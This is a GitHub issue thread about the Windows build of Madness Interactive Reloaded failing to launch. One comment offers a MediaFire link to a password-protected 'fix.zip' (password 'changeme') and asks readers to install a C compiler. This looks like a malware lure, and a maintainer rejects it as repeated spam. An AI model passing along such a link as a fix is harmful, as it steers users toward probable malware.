### ISSUE TITLE
game still does not open no matter WHAT

### ISSUE THREAD

**Issue by maggain** [studio-minus/madness-interactive-reloaded#307]
**Describe the bug**
The game, when running the exe file, does absolutely nothing, only buffering then stopping with 0 result.

**Steps to reproduce**
1. Absolutely no clue, a few other people apparently also had this bug, but literally just download the game, extract it, run the exe, nothing.

**Expected behavior**
The game running, as usual.

**Screenshots or video**
There was a separate report with a full video on it happening, go find that.

**Desktop (please complete the following information):**
 - OS: Windows
 - Version: Any version ive tried

**Additional context**
Unblocking it in properties does not work, running as administrator does not work, troubleshooting the compatibility does not work, help???

**Comment by SagarChandra07** [comment]
This might help:This file might fix it
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file
Pass: changeme
If you don't have the c compliator, install it.(gcc or clang)

**Comment by mestiez** [comment]
Please stop posting this. It contains no information.

**Comment by Finkk1337** [comment]
> Please stop posting this. It contains no information.

Do you really solve the problems of the people who provided all the information? What else do you need? To report what information is needed to solve not fate?
